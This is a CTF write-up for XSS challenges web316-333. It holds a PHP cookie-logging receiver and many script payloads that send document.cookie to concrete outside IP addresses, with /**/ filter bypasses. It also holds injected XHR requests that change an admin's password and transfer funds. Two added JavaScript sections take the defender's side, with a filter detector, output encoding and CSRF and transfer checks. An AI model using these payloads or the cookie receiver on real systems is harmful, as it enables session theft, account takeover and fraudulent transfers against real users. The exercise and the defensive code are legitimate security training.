web316-320: assorted basic techniques and bypasses
# a.php
<?php
// a.php on the VPS: append whatever arrives in the ?cookie= parameter to cookie.txt
$cookie = $_GET['cookie'];
$log = fopen("cookie.txt", "a");   // append mode, one line per hit
fwrite($log, $cookie . "\n");
fclose($log);
?>
VPS: http://101.42.23.134/
-------------------------
<script>
var img=document.createElement("img"); img.src="http://101.42.23.134/a.php?cookie="+document.cookie;
</script>
-------------------------
<script>window.open('http://124.222.103.14/a.php?cookie='+document.cookie)</script>
-------------------------
<script>window.location.href='http://124.222.103.14/a.php?cookie='+document.cookie</script>
-------------------------
<script>location.href='http://124.222.103.14/a.php?cookie='+document.cookie</script>
-------------------------
<input onfocus="window.open('http://124.222.103.14/a.php?cookie='+document.cookie)" autofocus>
-------------------------
<svg onload="window.open('http://124.222.103.14/a.php?cookie='+document.cookie)">
-------------------------
<iframe onload="window.open('http://124.222.103.14/a.php?cookie='+document.cookie)"></iframe>
--------------------------
<body onload="window.open('http://124.222.103.14/a.php?cookie='+document.cookie)">
web321-322: spaces are filtered
<iframe/**/onload="window.open('http://124.222.103.14/a.php?cookie='+document.cookie)"></iframe>
web323
<body/**/onload="window.open('http://124.222.103.14/a.php?cookie='+document.cookie)">
web324-325
<body/**/onload="window.open('http://101.42.23.134/a.php?cookie='+document.cookie)">
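Defender-side counterpart to the web321-325 space filter, as an added example that is not part of this writeup or the challenge code: it runs event-handler payloads shaped like the ones above through a naive space-stripping filter (an assumption about what the challenge does), shows that the /**/ variants survive it because the HTML tokenizer treats "/" inside a tag as attribute whitespace, and contrasts a detector that normalizes those separators with contextual output encoding, which makes the markup inert regardless of spacing. The attacker host is replaced by a constructed placeholder.

```javascript
// Added example, not the challenge's code. The filter below is an assumption about what the
// web321-325 challenges do (strip the literal space character and nothing else).

// Naive filter: remove spaces only.
function naiveSpaceFilter(input) {
  return input.replace(/ /g, "");
}

// Detector: the HTML tokenizer treats "/" inside a tag as attribute whitespace, so
// <body/**/onload= is parsed like <body onload=. Collapse comment-like "/**/" runs and bare
// "/" to spaces first, then look for an on*= attribute that follows a separator or a quote
// (the separator requirement keeps attributes such as data-only="1" from matching).
function containsInlineEventHandler(html) {
  const normalized = html.replace(/\/\*.*?\*\//g, " ").replace(/\//g, " ");
  return /<[a-z][a-z0-9]*[^>]*[\s"']on[a-z]+\s*=/i.test(normalized);
}

// Companion check for the <script> vectors listed at the top of the writeup.
function containsScriptTag(html) {
  return /<script\b/i.test(html);
}

// Mitigation: contextual output encoding. Text that lands in an HTML body or a quoted attribute
// goes through this; the result renders as literal characters, so the spacing trick is moot.
function escapeHtml(s) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return s.replace(/[&<>"']/g, (c) => map[c]);
}

// Constructed sample payloads modelled on the writeup, with the attacker host replaced.
const RECEIVER = "http://attacker.example/a.php?cookie="; // placeholder, not a real host
const SAMPLE_PAYLOADS = [
  `<body onload="window.open('${RECEIVER}'+document.cookie)">`,
  `<body/**/onload="window.open('${RECEIVER}'+document.cookie)">`,
  `<iframe/**/onload="window.open('${RECEIVER}'+document.cookie)"></iframe>`,
  `<svg onload="window.open('${RECEIVER}'+document.cookie)">`,
];

// For each payload: does a live handler survive the naive filter, does the detector catch the
// raw payload, and is the encoded form inert?
function evaluatePayloads(payloads = SAMPLE_PAYLOADS) {
  return payloads.map((p) => ({
    payload: p,
    survivesNaiveFilter: containsInlineEventHandler(naiveSpaceFilter(p)),
    flaggedByDetector: containsInlineEventHandler(p),
    inertAfterEncoding: !containsInlineEventHandler(escapeHtml(p)) && !containsScriptTag(escapeHtml(p)),
  }));
}

console.table(evaluatePayloads());
```

Running it shows the two payloads that use a literal space collapsing into a meaningless `<bodyonload=` after the naive filter, while both `/**/` variants keep a working handler; all four are caught by the normalizing detector and all four are inert once encoded, which is the point: encode on output rather than filter on input.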
web328
<script>window.open('http://124.222.103.14/a.php?cookie='+document.cookie)</script>
On this page, send over the cookie obtained through the XSS.
Register a user whose password is not filtered, so the JS executes; then impersonate the administrator and get the flag.
web329
On the page below, inject the following JS code:
<script>window.open('http://101.42.23.134/a.php?cookie='+document.getElementsByClassName('layui-table-cell laytable-cell-1-0-1')[1].innerHTML)</script>
web330
Register a user and force the admin to change the account password: the XSS goes in the username field.
<script>window.open('http://127.0.0.1/api/change.php?p=123456')</script>
Log in as the administrator, admin
web331
The login method becomes POST, and the registration method changes as well.
<script>var httpRequest = new XMLHttpRequest();httpRequest.open('POST', 'http://127.0.0.1/api/change.php', true);httpRequest.setRequestHeader("Content-type","application/x-www-form-urlencoded");httpRequest.send('p=123456');</script>
Log in as admin
web332
Transfer -10000 to admin
web333
Two methods
<script>var httpRequest = new XMLHttpRequest();httpRequest.open('POST', 'http://127.0.0.1/api/amount.php', true);httpRequest.setRequestHeader("Content-type","application/x-www-form-urlencoded");httpRequest.send('u=123&a=10000');</script>
-----------------------
Transfer to yourself: the balance grows exponentially, each amount must not exceed the current balance, and about 15 rounds should be enough.
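The web330-333 steps all drive a logged-in browser into a state-changing API (api/change.php, api/amount.php) that accepts a request carrying nothing but a parameter. As an added example that is not the challenge's code, the Node.js checks below show what such an endpoint needs to refuse: the GET issued by window.open, a same-origin XHR that carries only the session cookie, a negative transfer amount, and a transfer to oneself. The request shape, the origin, the field names (csrf, current, u, a) and the password verifier are assumptions.

```javascript
// Added example, not the challenge's code. Request and session shapes are assumptions:
//   req = { method, headers: { origin }, body: {...}, session: { user, csrfToken, balance } }
const APP_ORIGIN = "http://127.0.0.1"; // assumed origin of the challenge app

// Generic gate for any state-changing endpoint.
function authorizeStateChange(req) {
  // web330: window.open(...) issues a GET; state changes must not be reachable by GET.
  if (req.method !== "POST") return { ok: false, reason: "method" };
  // Cross-site forgery from another origin: browsers attach Origin to POSTs.
  if (req.headers.origin !== APP_ORIGIN) return { ok: false, reason: "origin" };
  // Per-session token that a foreign site cannot read.
  if (!req.body.csrf || req.body.csrf !== req.session.csrfToken) return { ok: false, reason: "csrf" };
  return { ok: true };
}

// Password change (the change.php step). Script injected into the app's own origin (web331)
// can read the CSRF token from the page, so the token alone does not stop it; the endpoint must
// also demand something the injected script does not have: the account's current password.
// verifyCurrentPassword(user, password) -> boolean is supplied by the caller (assumed helper).
function authorizePasswordChange(req, verifyCurrentPassword) {
  const gate = authorizeStateChange(req);
  if (!gate.ok) return gate;
  if (typeof req.body.p !== "string" || req.body.p.length < 8) return { ok: false, reason: "weak" };
  if (!verifyCurrentPassword(req.session.user, req.body.current)) return { ok: false, reason: "reauth" };
  return { ok: true };
}

// Transfer (the amount.php step): u = recipient, a = amount, both strings from the form body.
function validateTransfer(req) {
  const gate = authorizeStateChange(req);
  if (!gate.ok) return gate;
  const amount = Number(req.body.a);
  // web332: a negative amount would move money the other way; require a positive integer.
  if (!Number.isInteger(amount) || amount <= 0) return { ok: false, reason: "amount" };
  // web333: the writeup grows a balance by transferring to oneself; refuse it outright.
  if (req.body.u === req.session.user) return { ok: false, reason: "self" };
  if (amount > req.session.balance) return { ok: false, reason: "balance" };
  return { ok: true, newBalance: req.session.balance - amount };
}

// Constructed request builder used for the scenarios below.
function makeRequest(method, body, session, origin = APP_ORIGIN) {
  return { method, headers: { origin }, body, session };
}

// The writeup's vectors replayed against the checks (constructed session values).
function replayWriteupVectors() {
  const session = { user: "admin", csrfToken: "tok-constructed", balance: 100 };
  const verify = (user, pw) => user === "admin" && pw === "correct-current-password"; // constructed
  return {
    getViaWindowOpen: authorizePasswordChange(makeRequest("GET", { p: "123456" }, session), verify),
    xhrWithoutToken: authorizePasswordChange(makeRequest("POST", { p: "123456" }, session), verify),
    xhrWithStolenTokenNoReauth: authorizePasswordChange(
      makeRequest("POST", { p: "12345678", csrf: "tok-constructed" }, session), verify),
    negativeTransfer: validateTransfer(
      makeRequest("POST", { u: "admin", a: "-10000", csrf: "tok-constructed" }, { ...session, user: "alice" })),
    selfTransfer: validateTransfer(
      makeRequest("POST", { u: "admin", a: "100", csrf: "tok-constructed" }, session)),
    legitimateTransfer: validateTransfer(
      makeRequest("POST", { u: "bob", a: "40", csrf: "tok-constructed" }, session)),
  };
}

console.log(replayWriteupVectors());
```

The method and token checks are what stop a foreign page; the re-authentication requirement is what stops script already running on the app's origin, which is the situation in web330 and web331, and keeping cookies HttpOnly removes the cookie-theft vector from the earlier challenges as well. The transfer checks reject the negative amount from web332 and the self-transfer loop from web333 before any balance arithmetic runs.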